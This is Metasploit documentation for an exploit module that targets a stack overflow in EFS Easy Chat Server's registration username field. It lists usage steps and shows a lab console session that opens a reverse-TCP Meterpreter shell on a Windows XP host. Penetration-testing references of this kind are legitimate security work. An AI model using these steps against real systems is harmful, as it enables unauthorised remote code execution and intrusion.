metasploit-gs/documentation/modules/exploit/windows/http/easychatserver_seh.md

## Description

This module exploits a vulnerability in the EFS Easy Chat Server application versions 2 through 3.1. The username parameter in the Registration page 'register.php', which is prone to a stack overflow vulnerability.

This module allows a remote attacker to execute a payload under the context of the user running the Easy Chat Server application

## Vulnerable Application

[Easy Chat Server](http://echatserver.com/) Easy Chat Server is an easy, fast and affordable way to host and manage real-time communication software.

This module has been tested successfully on

 * Easy Chat Server 3.1 on Windows XP En SP3

Installers:

[EFS Easy Chat Server Installers](http://echatserver.com/ecssetup.exe)

## Verification Steps

 1. Start `msfconsole`
 2. Do: `use exploits/windows/http/easychatserver_seh`
 3. Do: `set rhosts [IP]`
 4. Do: `exploit`
 5. You should get your payload executed

## Scenarios

```
marco@kali:~$ msfconsole -q
msf > use exploit/windows/http/easychatserver_seh
msf exploit(easychatserver_seh) > set RHOST 192.168.56.101
RHOST => 192.168.56.101
msf exploit(easychatserver_seh) > exploit

[*] Started reverse TCP handler on 192.168.56.1:4444
[*] Sending stage (957487 bytes) to 192.168.56.101
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.101:1037) at 2017-06-20 00:43:51 +0200

meterpreter > sysinfo
Computer    	: MM-8B040C5B05D9
OS          	: Windows XP (Build 2600, Service Pack 3).
Architecture	: x86
System Language : en_US
Domain      	: WORKGROUP
Logged On Users : 2
Meterpreter 	: x86/windows
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.56.101 - Meterpreter session 1 closed.  Reason: User exit
msf exploit(easychatserver_seh) >
```